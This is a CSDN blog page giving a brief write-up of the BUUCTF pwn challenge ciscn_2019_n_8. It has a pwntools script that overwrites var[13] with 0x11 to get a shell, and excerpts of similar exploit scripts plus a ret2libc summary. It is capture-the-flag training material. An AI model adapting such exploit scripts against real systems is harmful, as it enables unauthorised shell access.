【BUUCTF - PWN】ciscn_2019_n_8

最新推荐文章于 2024-07-05 00:19:02 发布

古月浪子

最新推荐文章于 2024-07-05 00:19:02 发布

阅读量1.1k

点赞数

分类专栏： BUUCTF - PWN

本文链接：https://blog.csdn.net/tqydyqt/article/details/105147618

版权

BUUCTF - PWN 专栏收录该内容

22 篇文章 3 订阅

订阅专栏

checksec一下，好叭全开

IDA打开看看，var是int数组，如果var[13]=0x11的话就能get flag

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='i386'
context.log_level='debug'

sla=lambda x,y:io.sendlineafter(x,y)

io=remote('xxx',xxx)

payload=p32(0x11)*14
sla('\n',payload)

io.interactive()

附件：ciscn_2019_n_8

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

古月浪子

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BUUCTF pwn ciscn_2019_n_8

菜的只能随便写写博客

02-03

2624

0x01 文件分析文件很简单，32位，保护都开得差不多。 0x02 运行输入并且回显。 0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...

初学pwn-BUUCTF(ciscn_2019_n_1)

天柱的博客

08-31

635

初学pwn-writeUp BUUCTF的第四道题，ciscn-2019_n_1。首先还是链接远端查看一下。这里提示让猜一个数字，然后他告诉我们，这个数字应该是11.28125。这就有点掩耳盗铃了呀，但是输入了11.28125，还是在说应该输入11.28125。可能是有点问题，ida打开查看一下。可以看到主函数里，调用了三个函数，前两个都是set某个值，我们直接看func函数。那这就很明显了，刚刚输入的值赋给了v1，但是这里是要让v2的值等于11.28125才可以。查看一下地址。嗯，跟想象

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF-PWN-ciscn_2019_n_8

Henlenl的博客

05-18

227

文章目录查看文件信息IDA 分析exp 查看文件信息 checksec 一下,保护还开的挺满 canary(栈保护)，nx(堆栈不可执行)，PIE(地址随机化) IDA 分析其实我们应该nc 连一下的查看远程程序运行情况丢入 32位IDA分析一下很显然程序的意思就是让 var[13] == 17就能拿到shell了 exp from pwn import * r = remote('node3.buuoj.cn',27168) #r = process('./ciscn_2019_n_8')

【BUUCTF-PWN】9-ciscn_2019_n_8

最新发布

燕麦葡萄干的博客

07-05

334

4 + p32(17) #qword/IDA在32位里面是4个字节，在64位是/8个字节。不属于栈溢出，应该是比较简单的pwn，看懂代码逻辑+使用pwntools。32位，开启了Stack、NX、PIE保护。即当var数组的第十四个元素是17就可以。

[BUUCTF-pwn]——ciscn_2019_n_8

Y_peak的博客

02-10

2042

[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目上去checksec一下,吓一跳保护基本全开了。在IDA中一看，开心了。如此简单　只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +

BUUCTF ciscn_2019_n_8

、moddemod

06-11

396

exp from pwn import * context.log_level = 'debug' proc_name = './ciscn_2019_n_8' p = remote('node3.buuoj.cn', 26801) # p = process(proc_name) payload = 'a'.encode() * 13 * 4 + p64(17) p.sendline(payload) p.interactive()

buuctf ciscn_2019_n_8

carol2358的博客

04-15

276

ida: 直接有sh，只要让var[13]等于17就可以 exp： from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvl...

buuctf——ciscn_2019_n_8

qq_41560595的博客

03-21

564

查看权限开了好多权限查看源代码分析观察，var数组是int类型，在内存中占了4个字节。输入一个字符串，令var[13]处的值是17，且这个值占4个字节，就能拿到shell。 var中每一个元素占4个字节，payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节，就要用p64打包。解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*

BUUCTF栈迁移ciscn_2019_es_2

Rt1Text的博客

04-09

1036

1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数并没有什么 2.int vul()函数程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作但是shift+f12 这里仅仅是打印flag字符串,没有用同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数但是...

【BUUCTF - PWN】ciscn_2019_c_1

古月浪子的博客

03-20

4083

checksec一下 IDA打开看看，encrypt函数内存在栈溢出漏洞由于程序会将输入的内容加密，这会破坏我们的payload，所以注意到strlen函数，通过在payload开头放上 \0 来绕过加密由于程序内没有后门函数，也没有system函数，所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的，因此调用system需要栈对齐，这里填充ret来对齐 from pwn...

Buuctf(pwn)ciscn_2019_n_8

半岛铁盒的博客

03-28

239

保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了

buuctf pwn ciscn_2019_n_8

zip471642048的博客

06-21

365

checksec 看一下基本信息把程序拖到ida32分析一波，可以看到读入字符串给了 var 然后后面的v4，v5没起作用，然后判断了var[13]是不是等于\x11,是就给一个shell 所以只要让我们输入的字符后13位等于...

ciscn_2019_n_8

m0sway的博客

03-16

687

Buu PWN ciscn_2019_n_8 详解writeup

BUUCTF Pwn ciscn_2019_n_8 1

MrTreebook的博客

12-05

916

ciscn_2019_n_8 11.题目下载地址2.checksec检查保护3.IDA分析4.exp 1.题目下载地址点击下载题目 2.checksec检查保护所有保护全开，现在也不知道有什么办法试着运行一下，可能又是canary绕过 3.IDA分析 init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5); if ( *(_QWORD *)&var[13] ) { if ( *(_

[buuctf]ciscn_2019_n_8

逆向萌新的博客

06-19

455

[buuctf]ciscn_2019_n_8

buuctf之ciscn_2019_n_8

weixin_54452942的博客

04-12

534

两个方法解题

buuctf [HarekazeCTF2019]baby_rop2

09-30

[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中，主要的目标是获取read函数的地址，并利用该地址泄漏libc基址，然后计算system函数和/bin/sh字符串的地址，最终执行system('/bin/sh')获取shell权限。解题的过程中，通过找到rsi寄存器的地址，将其设置为read函数的地址，然后再通过调用printf函数，将read函数的地址泄漏出来，从而计算libc基址。